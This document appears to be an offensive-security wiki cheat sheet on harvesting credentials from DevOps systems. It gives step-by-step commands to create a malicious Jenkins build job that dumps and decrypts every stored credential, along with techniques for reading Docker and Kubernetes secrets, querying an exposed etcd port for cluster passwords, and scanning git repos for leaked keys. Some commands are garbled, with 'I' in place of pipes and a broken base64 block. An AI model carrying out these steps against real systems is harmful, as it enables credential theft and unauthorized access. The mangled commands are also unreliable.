DevOps Credentials

## JENKINS SCENARIO: You've obtained credentials for a user with build job privileges on a Jenkins server. With that user you can now dump all the credentials on the Jenkins server and decrypt them by creating a malicious build job. ### STEP 1: Log into the Jenkins server with the obtained user account: https://<Jenkins_IPAddr>/script/ ### STEP 2: Find an obscure location to run your build job and follow the below navigational tree: New Item -> Freeform Build "New Project"-> Configure -> General -> Restrict Where This Is Run -> Enter "Master" -> Build -> Add Build Step -> Execute Shell ### STEP 3: Execute the following commands in the shell: ```shell echo echo "credentials.xml" cat ${JENKINS_HOME}/credentials.xml echo "" echo "master.key" cat ${JENKINS_HOME}/secrets/master.key I base64 -w 0 echo "" echo "hudson.util.Secret" cat ${JENKINS_HOME}/secrets/hudson.util.Secret I base64 -w 0 ``` ### STEP 4: Save the build job "Jobs" view page click "Build Now" ### STEP 5: Build History Navigate to "Build History" and click on your build job number. Then click on "Console Output". ### STEP 6: Credentials.xml Copy the text of the "credentials.xml" and place it into a local file on your attack workstation named "credentials.xml" ### STEP 7: Encoded Keys Copy the base64 encoded "master.key" and "hudson.util.Secrets" and decode them into their own files on your local attack workstation: ```shell echo <base64 string master.key> I base64 --decode > master.key echo <base64 string hudson.util.Secret> I base64 --decode > hudson.util.Secret ``` ### STEP 8: Jenkins-decrypt Download the "jenkins-decrypt" python script: https://github.com/tweksteen/jenkins-decrypt ### STEP 9: Decrypt keys Decrypt the "credentials.xml" file using "master.key" and "hudson.util.Secret": ```bash decrypt.py <master.key> <hudson.util.Secret> <credentials.xml> ``` ## DOCKER If you gain access to a Docker container you can check the following location for possible plaintext or encoded Docker passwords, api_tokens, etc. that the container is using for external services. You may be able to see Docker secret locations or names by issuing: ```bash $ docker secret ls ``` Depending on the OS your target Docker container is running you can check the following locations for secret file locations or mounts. #### Linux Docker Secrets Locations /run/secrets/<secret_name>` ```bash # `Windows Docker Secrets Locations ` # `C:\ProgramData\Docker\internal\secrets ` # `C:\ProgramData\Docker\secrets ` ``` ## KUBERNETES #### SECRETS FILE LOCATIONS In Kubernetes secrets such as passwords, api_tokens, and SSH keys are stored "Secret". You can query what secrets are stored by issuing: ```bash $ kubectl get secrets $ kubectl describe secrets/<Name> ``` To decode a secret username or password perform the following: ```bash $ echo '<base64_username_string' $ echo '<base64_password_string' base64 -decode base64 --decode ``` Also be on the lookout for volume mount points where secrets can be stored as well and referenced by the pod. ### CREDS EXPOSURE Also in Kubernetes you may get lucky and find an exposed port 2379 misconfigured. Performing a GET on a specific resource may expose passwords for the pod or cluster. ### STEP 1: Perform a GET on the following Kubernetes path: ```shell # http://<Kube_IPAddr>:2379/v2/keys/?recursive=true ``` ### STEP 2: Look through returned results identifying possible credentials or kublet tokens. ## GIT REPOS It's advantageous to search git repos like Github or Gitlab for exposed credentials, api keys, and other authentication methods. ### TRUFFLE HOG https://github.com/dxa4481/truffleHog ### STEP 1: pip install truffleHog ### STEP 2: Point it at a git repo or local branches: ```bash truffleHog --regex --entropy=False https://github.com/someco/example.git truffleHog file:///user/someco/codeprojects/example/ ``` ### GITROB Gitrob will clone repos to moderate depth and then iterate through commit histories flagging files that match potentially sensitive content. https://github.com/michenriksen/gitrob https://github.com/michenriksen/gitrob/releases ### STEP 1: Download precompiled gitrob release ### STEP 2: Login and generate/copy your GITHUB access token: https://github.com/settings/tokens ### STEP 3: Launch Gitrob in analyze mode ```bash gitrob analyze <username> --site=https://github.example.com endpoint=https://github.example.com/api/v3 --access-tokens=token1,token2 ``` [[Home]] #howto